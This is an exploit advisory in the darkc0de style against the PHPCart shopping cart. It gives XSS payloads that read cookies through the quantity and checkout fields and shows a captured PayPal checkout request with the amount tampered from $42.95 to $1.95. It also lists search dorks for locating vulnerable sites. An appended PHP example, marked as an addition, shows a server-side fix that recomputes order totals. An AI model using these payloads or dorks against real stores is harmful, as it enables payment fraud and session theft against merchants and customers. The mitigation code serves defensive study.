`################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu #
# -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE #
#-r45c4l -Bond #
################################################################
#
# Author: h4x0r
#
# Home : www.darkc0de.com
#
# Email : [email protected]
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple exploits (XSS & data manipulation) in PHPCart (PHP ECommerce Shopping Cart System ) v3.4 - 4.6.4
#
# Soft.Site: http://phpcart.net/
#
#Exploit 1: XSS
#
# phpCart is an open source, web-based PHP shopping cart system for e-commerce websites. A user can run the
# following script in the "quantity" field, the "Add Engraving" field, or any other field where a script can be
# manually injected, to get the current cookies.
#
# POC1:- http://www.site.com/phpcart/
# Enter something like <script>alert(document.cookie);</script> in the "quantity" field, the "Add Engraving" field,
# or any other field, to get the current cookies.
#
# POC2:- http://www.site.com/phpcart/phpcart.php
# Injecting an XSS script into the "Quantity" field results in the XSS attack.
#
# POC3:- http://www.site.com/phpcart/phpcart.php?action=checkout
# Injecting an XSS script into input fields such as "Name", "Company" and "Address, Include City & Prov/State"
# results in the XSS attack.
#
# Live Demo:- http://phpcart.net/demo/phpcart/
#
#
# Exploit 2: Data manipulation
#
#DESCRIPTION:
#A vulnerability in PHPCart can be exploited by malicious people to manipulate orders.
#The problem is that the "price" and "postage" parameters are not properly verified in "phpcart.php". This can be
#exploited to change the price of a product being bought by modifying the "price" parameter directly using an
#intermediate proxy.
#
#POC:- http://www.site.com/phpcart/phpcart.php
#It was discovered that the main process of online merchant payment was based solely on client-side verification.
#The PHP module (phpcart.php) receives the payment amount from the client side, forwards the amount and sends back
#the total price to the backend server for further payment processing.
#There was no proper validation mechanism at the backend to validate the data submitted by the PHP module.
#Potential attackers could tamper with the data and modify the total amount.
#Before the transaction entered the merchant gateway, we captured the data using an intermediate proxy, and the total amount, shown as $XX, was tampered with and changed.
#
#POC Example:
#Extract price of purchase:-
#ID Description Price Qty. Amount
#GB1000 Golf Balls - Long Distance 1 $28.95 + $14 shipping charges so total amount is 42.95
#
#Intercept before manipulation:-
#After the verification form, when the page is redirecting to the payment gateway, the request is intercepted. The gateway selected is PayPal.
#
#User-Agent: Opera/9.26 (Windows NT 5.1; U; en)
#Host: www.paypal.com
#Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
#Accept-Language: en-US,en;q=0.9
#Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
#Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
#Referer: http://www.phpcart.net/demo/phpcart/phpcart.php
#Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=VDrukd29DPvnkTqVFUSeG52gR2iAX22piQHagEGhU
#Cookie2: $Version=1
#Connection: Keep-Alive, TE
#TE: deflate, gzip, chunked, identity, trailers
#Content-Type: application/x-www-form-urlencoded
#Content-Length: 286
#
#cmd=_xclick&upload=1&currency_code=USD&business=sales%40phpcart.net&notify_url=&
#item_name=Shopping+Cart+Order+-+B17B3A57D&return=&cancel_return=&invoice=B17B3A57D&
#firstname=xyz&lastname=qdqd&address1=sfsf&address2=sdfsf&city=sdfsf&state=NE&zip=sfsf&rm=2&amount=42.95&handling_cart=18.00
#
#Here price=42.95 was tampered with and changed to 1.95,
#and you can see that the price on the PayPal gateway will be $1.95.
#
# Live Demo:- http://phpcart.net/demo/phpcart/
#
# Dork:- phpcart/phpcart.php?
# Dork:- Powered by phpCart
#
#
#
################################################################ `
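
The mitigation for the data manipulation issue, as an added example that is not part of the original advisory or PHPCart's code: the total is computed from a server-side catalogue, stored with the order, and compared with what the gateway reports before anything is fulfilled. The catalogue, the function names and the `$reported` array are assumptions; its keys reuse the field names from the captured request, and the gateway notification is assumed to have been authenticated already.

```php
<?php
declare(strict_types=1);

// Constructed server-side catalogue (cents). Item and shipping values mirror the advisory's example.
const CATALOGUE = ['GB1000' => ['name' => 'Golf Balls - Long Distance', 'price_cents' => 2895]];
const SHIPPING_CENTS = 1400;

// Total is derived from server data only; client-sent "price" and "postage" are never read.
function order_total_cents(array $lines): int
{
    $total = 0;
    foreach ($lines as $sku => $rawQty) {
        if (!array_key_exists($sku, CATALOGUE)) {
            throw new InvalidArgumentException('unknown item');
        }
        // Quantity must be a plain integer in range; markup or other text is rejected here.
        $qty = filter_var($rawQty, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 99]]);
        if ($qty === false) {
            throw new InvalidArgumentException('invalid quantity');
        }
        $total += CATALOGUE[$sku]['price_cents'] * $qty;
    }
    return $total + SHIPPING_CENTS;
}

// Strict decimal parse ("42.95" -> 4295); anything else yields null.
function amount_to_cents(string $amount): ?int
{
    return preg_match('/^(\d{1,7})\.(\d{2})$/', $amount, $m) === 1
        ? (int) $m[1] * 100 + (int) $m[2]
        : null;
}

// Fulfil only when the amount, currency and invoice reported by the gateway match the stored order.
function payment_matches_order(array $order, array $reported): bool
{
    $paid = amount_to_cents((string) ($reported['amount'] ?? ''));
    return $paid !== null
        && $paid === $order['total_cents']
        && ($reported['currency_code'] ?? null) === $order['currency']
        && ($reported['invoice'] ?? null) === $order['invoice'];
}

// Constructed demo: the order is stored before redirecting; the second report carries an altered amount.
$order = ['invoice' => 'B17B3A57D', 'currency' => 'USD', 'total_cents' => order_total_cents(['GB1000' => '1'])];
foreach (['42.95', '1.95'] as $amount) {
    $reported = ['invoice' => 'B17B3A57D', 'currency_code' => 'USD', 'amount' => $amount];
    echo $amount, ' => ', payment_matches_order($order, $reported) ? 'fulfil' : 'hold for review', PHP_EOL;
}
```

Amounts are kept as integer cents so the comparison is exact and never depends on floating-point rounding.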